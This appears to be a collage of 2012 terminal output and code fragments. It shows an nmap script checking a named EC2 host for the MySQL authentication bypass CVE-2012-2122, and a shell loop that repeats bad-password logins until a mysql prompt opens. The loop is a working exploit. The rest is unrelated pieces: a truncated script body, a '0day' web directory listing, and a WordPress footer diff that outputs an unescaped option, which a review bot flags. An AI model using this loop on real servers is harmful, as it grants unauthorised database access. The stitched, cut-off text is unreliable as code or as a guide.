# nmap -v -d --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:59 BST
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0

-- Version 0.1
-- Created 11/06/2012 - v0.1 - created by Marc Wickenden <marc@offensivecoder.com>, based on nse script by Patrik Karlsson

description = [[
Checks for MySQL servers vulnerable to the authentication bypass CVE-2012-2122
posted to http://seclists.org/oss-sec/2012/q2/493
]]
---
-- @output
-- 3306/tcp open mysql
-- | mysql-auth-bypass:
-- |_ user root is vulnerable to auth bypass

socket:close()
end
end

return stdnse.format_output(true, result)
end

root@7E-Marc:~# for i in `seq 1 1000`; do mysql -u nse --password=bad -h ec2-46-137-134-79.eu-west-1.compute.amazonaws.com 2>/dev/null; done
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 756
Server version: 5.5.22-0ubuntu1-log (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>

root@7E-Marc:~# ls -l /usr/local/share/nmap/scripts/mysql-*
-rw-r--r-- 1 root root 6099 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-audit.nse
-rw-r--r-- 1 root root 2268 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-brute.nse
-rw-r--r-- 1 root root 2895 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-databases.nse
-rw-r--r-- 1 root root 1799 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-empty-password.nse
-rw-r--r-- 1 root root 4855 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-info.nse
-rw-r--r-- 1 root root 2687 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-users.nse
-rw-r--r-- 1 root root 3100 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-variables.nse

# nmap --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:58 BST
Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79)
Host is up (0.050s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-auth-bypass:
|_ user nse is vulnerable to auth bypass

root@debian1:/var/www/0day# ls -l
total 4
-rw-r--r-- 1 root root 41 Jun 15 11:25 test.php
root@debian1:/var/www/0day# curl http://localhost/0day/test.php
nothing to see here
root@debian1:/var/www/0day# cp test.php{,~}
root@debian1:/var/www/0day# ls -l
total 8
-rw-r--r-- 1 root root 41 Jun 15 11:25 test.php
-rw-r--r-- 1 root root 41 Jun 15 11:26 test.php~

diff -ruw responsive.1.6.2/footer.php responsive.1.6.2-vimeo/footer.php | |
--- responsive.1.6.2/footer.php 2012-06-19 09:35:37.495143600 +0100 | |
+++ responsive.1.6.2-vimeo/footer.php 2012-06-19 09:25:42.000000000 +0100 | |
@@ -64,6 +64,10 @@ | |
.'<img src="' . get_stylesheet_directory_uri() . '/icons/youtube-icon.png" width="24" height="24" alt="YouTube">' | |
.'</a></li>'; | |
+ if (!empty($options['vimeo_uid'])) echo '<li class="vimeo-icon"><a href="' . $options['vimeo_uid'] . '">' | |
+ .'<img src="' . get_stylesheet_directory_uri() . '/icons/vimeo-icon.png" width="24" height="24" alt="Vimeo">' | |
+ .'</a></li>'; |
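Review bot: The added Vimeo link concatenates `$options['vimeo_uid']` straight into the `href` attribute with no escaping, so whatever is stored in that theme option is written verbatim into the footer of every page. Pass it through WordPress's `esc_url()` before output, i.e. `'<a href="' . esc_url($options['vimeo_uid']) . '">'`. The option is named `vimeo_uid` but is used as a complete URL; either document that the field expects a full URL or build the link from the ID so the scheme and host are fixed.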